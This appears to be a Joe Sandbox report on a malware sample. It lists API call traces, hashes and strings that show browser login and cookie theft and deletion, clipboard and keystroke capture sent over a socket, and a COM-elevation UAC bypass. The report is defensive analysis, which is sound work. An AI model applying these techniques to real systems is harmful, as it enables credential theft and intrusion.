                                                                                                                                        • API ID: Find$CloseFile$FirstNext
                                                                                                                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                        • API String ID: 1164774033-3681987949
                                                                                                                                        • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                                                                        • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                                                                        • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                                                                        • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                                                                                        APIs
                                                                                                                                        • OpenClipboard.USER32 ref: 004168FD
                                                                                                                                        • EmptyClipboard.USER32 ref: 0041690B
                                                                                                                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                                                                                        • CloseClipboard.USER32 ref: 00416990
                                                                                                                                        • OpenClipboard.USER32 ref: 00416997
                                                                                                                                        • GetClipboardData.USER32 ref: 004169A7
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                                                        • CloseClipboard.USER32 ref: 004169BF
                                                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                        • String ID: !D@
                                                                                                                                        • API String ID: 3520204547-604454484
                                                                                                                                        • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                                                                        • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                                                                                        • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                                                                        • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$Close$File$FirstNext
                                                                                                                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                        • API String ID: 3527384056-432212279
                                                                                                                                        • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                                                                        • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                                                                        • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                                                                        • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                                                                                                                          • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                          • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                                                        • String ID: @0O$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                                                                        • API String ID: 3756808967-1553100252
                                                                                                                                        • Opcode ID: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                                                                                                        • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                                                                                        • Opcode Fuzzy Hash: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                                                                                                        • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                                                                                        APIs
                                                                                                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 297527592-0
                                                                                                                                        • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                                                                        • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                                                                                        • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                                                                        • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                                                                        • API String ID: 0-1861860590
                                                                                                                                        • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                                                                        • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                                                                                        • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                                                                        • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,@0O,004752F0,00000001), ref: 0041C37D
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,@0O,004752F0,00000001), ref: 0041C3AD
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,@0O,004752F0,00000001), ref: 0041C41F
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,@0O,004752F0,00000001), ref: 0041C42C
                                                                                                                                          • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,@0O,004752F0,00000001), ref: 0041C402
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,@0O,004752F0,00000001), ref: 0041C44D
                                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,@0O,004752F0,00000001), ref: 0041C463
                                                                                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,@0O,004752F0,00000001), ref: 0041C46A
                                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,@0O,004752F0,00000001), ref: 0041C473
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                        • String ID: @0O
                                                                                                                                        • API String ID: 2341273852-3070115360
                                                                                                                                        • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                                                        • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                                                                        • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                                                        • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                                                                        APIs
                                                                                                                                        • _wcslen.LIBCMT ref: 0040755C
                                                                                                                                        • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Object_wcslen
                                                                                                                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                        • API String ID: 240030777-3166923314
                                                                                                                                        • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                                                        • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                                                                                        • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                                                        • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                                                                                        APIs
                                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A84C
                                                                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3587775597-0
                                                                                                                                        • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                                                                                        • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                                                                                        • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                                                                                        • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                        • String ID: JD$JD$JD
                                                                                                                                        • API String ID: 745075371-3517165026
                                                                                                                                        • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                                        • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                                                                                        • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                                        • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$CloseFile$FirstNext
                                                                                                                                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                        • API String ID: 1164774033-405221262
                                                                                                                                        • Opcode ID: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                                                                                                                        • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                                                                        • Opcode Fuzzy Hash: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                                                                                                                        • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                                                                          • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Find$CreateFirstNext
                                                                                                                                        • String ID: 8SG$PXG$PXG$NG$PG
                                                                                                                                        • API String ID: 341183262-3812160132
                                                                                                                                        • Opcode ID: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                                                                                                                        • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                                                                                        • Opcode Fuzzy Hash: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                                                                                                                        • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1888522110-0
                                                                                                                                        • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                                                                        • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                                                                                        • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                                                                        • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                                                                                        APIs
                                                                                                                                        • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                        • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                        • API String ID: 2127411465-314212984
                                                                                                                                        • Opcode ID: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                                                                                                                        • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                                                                                        • Opcode Fuzzy Hash: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                                                                                                                        • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 00449292
                                                                                                                                        • _free.LIBCMT ref: 004492B6
                                                                                                                                        • _free.LIBCMT ref: 0044943D
                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                                                                        • _free.LIBCMT ref: 00449609
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 314583886-0
                                                                                                                                        • Opcode ID: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                                                                                                        • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                                                                                                        • Opcode Fuzzy Hash: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                                                                                                        • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                                          • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                                          • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                                          • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                                          • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                                                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                                                                        • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                        • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                                                        • API String ID: 1589313981-2876530381
                                                                                                                                        • Opcode ID: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                                                                                        • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                                                                        • Opcode Fuzzy Hash: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                                                                                        • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                                                                        APIs
                                                                                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                                                                        • GetLastError.KERNEL32 ref: 0040BA93
                                                                                                                                        Strings
